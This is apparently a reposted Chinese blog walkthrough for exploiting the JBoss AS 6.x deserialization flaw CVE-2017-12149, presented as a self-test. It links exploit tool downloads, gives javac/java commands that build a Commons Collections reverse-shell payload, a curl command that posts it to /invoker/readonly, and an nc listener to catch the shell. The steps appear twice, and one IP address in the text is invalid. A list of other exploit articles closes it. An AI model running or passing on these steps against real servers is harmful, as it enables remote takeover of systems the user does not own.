CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用--自测
2017-11-27 18:45
1181 查看
1.下载jboss
http://jbossas.jboss.org/downloads/
2.安装配置,自己百度
3.修改配置,端口和ip远程可以访问
路径:jboss-6.1.0.Final\server\default\deploy\jbossweb.sar\server.xml
4.启动服务
到bin目录下启动run.bat
5.访问ip+端口(8082)
6.验证是否存在漏洞
http://ip:8082/invoker/readonly/
返回500 一般就是存在了。
7.下载利用工具
原: http://scan.javasec.cn/java/JavaDeserH2HC.zip
使用方法:
这个时候会生成一个ReverseShellCommonsCollectionsHashMap.ser文件,curl 这个二进制文件就可以了。
ReverseShellCommonsCollectionsHashMap.ser 打包到http://scan.javasec.cn/java/ReverseShellCommonsCollectionsHashMap.ser
简化的利用工具:
http://scan.javasec.cn/java/jboss_CVE-2017-12149.zip
8.本机机器执行nc 进行端口监听
nc.exe -l -p 1234
9.执行利用工具
10.查看反弹
11.利用成功
参考地址:
http://www.cnblogs.com/sevck/p/7874438.html
http://jbossas.jboss.org/downloads/
2.安装配置,自己百度
3.修改配置,端口和ip远程可以访问
路径:jboss-6.1.0.Final\server\default\deploy\jbossweb.sar\server.xml
4.启动服务
到bin目录下启动run.bat
5.访问ip+端口(8082)
6.验证是否存在漏洞
http://ip:8082/invoker/readonly/
返回500 一般就是存在了。
7.下载利用工具
原: http://scan.javasec.cn/java/JavaDeserH2HC.zip
使用方法:
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port //反弹shell的IP和端口
这个时候会生成一个ReverseShellCommonsCollectionsHashMap.ser文件,curl 这个二进制文件就可以了。
ReverseShellCommonsCollectionsHashMap.ser 打包到http://scan.javasec.cn/java/ReverseShellCommonsCollectionsHashMap.ser
curl http://192.268.197.25:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
简化的利用工具:
http://scan.javasec.cn/java/jboss_CVE-2017-12149.zip
8.本机机器执行nc 进行端口监听
nc.exe -l -p 1234
9.执行利用工具
10.查看反弹
11.利用成功
参考地址:
http://www.cnblogs.com/sevck/p/7874438.html
相关文章推荐
- CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用
- JBOSS AS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)
- 【每日安全资讯】通过JBoss反序列化(CVE-2017-12149)浅谈Java反序列化漏洞
- CVE-2017-3248——WebLogic反序列化漏洞利用工具
- OFFICE OLE2LINK(CVE-2017-0199)漏洞利用详解
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
- Apache Tomcat远程命令执行漏洞(CVE-2017-12615) 漏洞利用到入侵检测
- GitHub现VMware虚拟机逃逸EXP,利用三月曝光的CVE-2017-4901漏洞
- 【每日安全资讯】漏洞预警 | WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)
- CVE-2017-7269 IIS6.0利用MSF远程溢出漏洞提权
- CVE-2017-11882漏洞利用
- Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)
- CVE-2017-11826漏洞利用样本分析
- CVE 2017-0199漏洞利用的新姿势
- office漏洞 CVE-2017-11882 msf利用
- vmware漏洞之三——Vmware虚拟机逃逸漏洞(CVE-2017-4901)Exploit代码分析与利用
- 腾讯反病毒实验室预警:CVE-2017-11882漏洞最新利用方法
- CVE-2017-8890漏洞分析与利用(Root Android 7.x)
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
- 利用CVE-2017-11882漏洞利用的恶意样本分析